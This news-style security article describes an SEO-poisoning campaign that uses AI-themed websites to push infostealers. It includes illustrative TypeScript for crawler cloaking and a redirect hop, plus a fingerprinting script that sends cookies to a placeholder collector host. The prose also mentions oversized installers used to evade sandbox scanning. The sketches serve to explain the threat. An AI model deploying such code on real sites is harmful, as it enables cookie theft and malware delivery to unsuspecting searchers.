Cybercriminals are creating AI-themed websites that game search engine algorithms so their malicious pages rank prominently in search results.

Researchers from Zscaler ThreatLabz recently uncovered a sophisticated cyber campaign that exploits public interest in popular AI tools such as ChatGPT and Luma AI. Threat actors have created AI-themed websites that use Black Hat SEO techniques to manipulate search engine rankings, making these malicious sites appear prominently in results for trending AI-related queries.
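One Black Hat SEO tactic commonly seen in SEO-poisoning campaigns of this kind is cloaking: the server shows keyword-stuffed content to search engine crawlers while steering real visitors toward the attack chain. The sketch below is a minimal, hypothetical illustration of that idea in TypeScript (Node's built-in http module); the user-agent check and URLs are assumptions for illustration, not details taken from the Zscaler report.

```typescript
import * as http from "http";

// Crude crawler detection by User-Agent substring (real campaigns use
// more elaborate checks, such as IP ranges of known crawlers).
const CRAWLER_PATTERN = /Googlebot|bingbot/i;

http.createServer((req, res) => {
  const ua = req.headers["user-agent"] ?? "";

  if (CRAWLER_PATTERN.test(ua)) {
    // Crawlers receive keyword-stuffed HTML so the page ranks for AI queries.
    res.writeHead(200, { "Content-Type": "text/html" });
    res.end("<html><body><h1>Free ChatGPT and Luma AI downloads</h1></body></html>");
  } else {
    // Real visitors are pushed into the redirection chain instead.
    res.writeHead(302, { Location: "https://redirector.example/step1" });
    res.end();
  }
}).listen(8080);
```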

When users search for terms associated with these AI platforms, they may encounter the poisoned results. Clicking the links triggers a multi-stage redirection chain, often driven by JavaScript, that ultimately delivers malware payloads such as Vidar Stealer, Lumma Stealer, and Legion Loader. These families are known for stealing sensitive information, including credentials and cryptocurrency wallet data, and are sometimes packaged as oversized installer files, a trick that helps them slip past security sandboxes, which often skip scanning very large files.
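Client-side redirects of this kind usually amount to only a few lines of script per hop. The following TypeScript sketch shows the basic pattern of a single hop in such a chain; the delay, the use of location.replace, and the next-hop URL are illustrative assumptions, not code recovered from the campaign.

```typescript
// One hop of a JavaScript redirection chain: wait briefly, then forward
// the visitor to the next stage. Attackers chain several such pages
// before the final payload download. The URL below is hypothetical.
const NEXT_HOP = "https://intermediate.example/next-stage";

window.setTimeout(() => {
  // replace() keeps this hop out of the browser history, making the
  // chain harder to retrace.
  window.location.replace(NEXT_HOP);
}, 1500);
```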

The campaign also employs browser fingerprinting to collect detailed information about the user’s device—such as browser version, screen resolution, user agent, and cookies—before redirecting them to the final malware download page. The attackers use legitimate platforms like AWS CloudFront to host their scripts, making the malicious activities harder to detect.
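Fingerprinting of the kind described here can be done with a handful of standard DOM APIs. The sketch below is a minimal TypeScript illustration of how such a script might gather the listed attributes and report them before triggering the final redirect; the collection endpoint and download URL are hypothetical placeholders.

```typescript
// Collect the attributes mentioned above using standard browser APIs,
// then report them before moving the visitor on.
const fingerprint = {
  userAgent: navigator.userAgent,             // browser and version string
  screen: `${screen.width}x${screen.height}`, // screen resolution
  cookies: document.cookie,                   // cookies visible to the page
};

fetch("https://collector.example/fp", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify(fingerprint),
}).finally(() => {
  // Only after the device profile is sent is the visitor forwarded to
  // the final download page.
  window.location.href = "https://final-download.example/installer";
});
```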

This campaign highlights how cybercriminals are leveraging the hype around AI tools to trick users, and it underscores the need for vigilance when searching for or downloading software related to trending technologies.